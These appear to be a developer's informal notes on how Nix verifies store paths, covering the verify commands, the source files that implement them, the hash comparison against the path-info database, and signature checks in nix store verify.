Verification
Table of Contents
1. Nix store path verification
1.1. Commands
nix-store --verify nix-store --verify-path ... nix store verify nix verify
1.2. Code
- nix verify is a shorthand for nix store verify
- nix store verify
- nix-store –verify/–verify-path
1.3. Algorithm
All three are implemented separately but perform essentially the same thing.
- get pathInfo with store->queryPathInfo
- get path's hash from store->narFromPath
- compare
- (nix3) verify sigs
queryPathInfo is implemented in mysterious ways in store-api.cc, which essentially boils down to pulling the info from a sqlite db. narFromPath is virtual, and as far as I can tell the default store implementation is local-fs-store.cc.
1.4. PathInfo db
Stores path-info, implemented in nar-info-disk-cache.cc. Gets populated and read on queries, i.e. queryPathInfo. Contains, most notably, file and nar hashes, and sigs.
1.5. narFromPath
local-fs-store.cc implements it by reading actuall store path. Other store implementations just run local-fs's function, thus seemingly db is independent from the store.
1.6. nix3
nix store verify seems to be the most sophisticated of the three. Apart from doing nix-store's thing nix3 verifies signatures - first the local ones, then the ones available from substituters. Verification entails comparing path's fingerprint - i.e. refs, path and hash, signed to signatures provided. Fingerprint is obtained from local path info.